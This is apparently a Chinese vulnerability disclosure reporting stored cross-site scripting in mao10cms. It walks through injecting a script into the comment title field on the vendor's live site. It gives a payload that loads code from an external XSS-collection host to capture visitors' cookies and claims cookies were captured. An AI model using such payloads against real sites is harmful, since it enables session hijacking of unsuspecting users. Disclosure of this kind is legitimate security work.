### 简要描述:
mao10cms存在存储型Xss(已打到cookie)
### 详细说明:
我先提供用这个系统的网站吧
[<img src="https://images.seebug.org/upload/201504/27195641f4a0bcd68018f38daf05aca339950941.png" alt="t012e4d7cdf92f694dd.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/27195641f4a0bcd68018f38daf05aca339950941.png)
[<img src="https://images.seebug.org/upload/201504/27195813eff560135804d1081ed30701b4ec279a.png" alt='t0155ddb<img src="https://images.seebug.org/upload/201504/272000110f8043381286e98d6be2145f9bc96aec.png" alt="t01eb78d4aabd822b6a.png" /<img src="https://images.seebug.org/upload/201504/27195838cfdeea11ee29587c0dfddf83a7be9dd1.png" alt="t01927b3a24d237dd4e.png' width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/27195813eff560135804d1081ed30701b4ec279a.png)
[<img src="https://images.seebug.org/upload/201504/271958574eba1d69e0f5076371625a08f7e44871.png" alt="t01f7091f8726eb1295.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/271958574eba1d69e0f5076371625a08f7e44871.png)
这些够了吧
官网http://www.mao10.com
我们先来到这个链接http://www.mao10.com/post-group-single-id-283.html
下面有提交评论,我们把他们都填上我们Xss 平台接收的代码
我的代码是<script src=http://xxs.la/r3TBKf></script>
标题可以直接填入,但是内容被过滤了的,
[<img src="https://images.seebug.org/upload/201504/272002218f4c6eb07f2b290b596187b7ac39c925.png" alt="t01eb78d4aabd822b6a.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/272002218f4c6eb07f2b290b596187b7ac39c925.png)
[<img src="https://images.seebug.org/upload/201504/272002394b499d94c4793027e7306d579e6954bd.png" alt="t0183d8497a0fdd221c.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/272002394b499d94c4793027e7306d579e6954bd.png)
[<img src="https://images.seebug.org/upload/201504/27200252fd7cacb8e1b5a31169f5bd3da00fec3c.png" alt="t0183d8497a0fdd221c(1).png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/27200252fd7cacb8e1b5a31169f5bd3da00fec3c.png)
然后提交
会提示请输入标题和内容 这个不用管它 然后等他跳转
这时候已经看到 成功打到cookie了
[<img src="https://images.seebug.org/upload/201504/27200335d20b873004cef9a8a6190b89f4ab2857.png" alt="t0151daaf3e65960435.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/27200335d20b873004cef9a8a6190b89f4ab2857.png)
这里如果把代码换成`<script>alert(/Z4lx/)</script>` 还是一样的效果 弹出对话框
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201504/2720043830072b4d7343a0ebdcbbe6b8194fb201.png" alt="t0151daaf3e65960435.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/2720043830072b4d7343a0ebdcbbe6b8194fb201.png)
暂无评论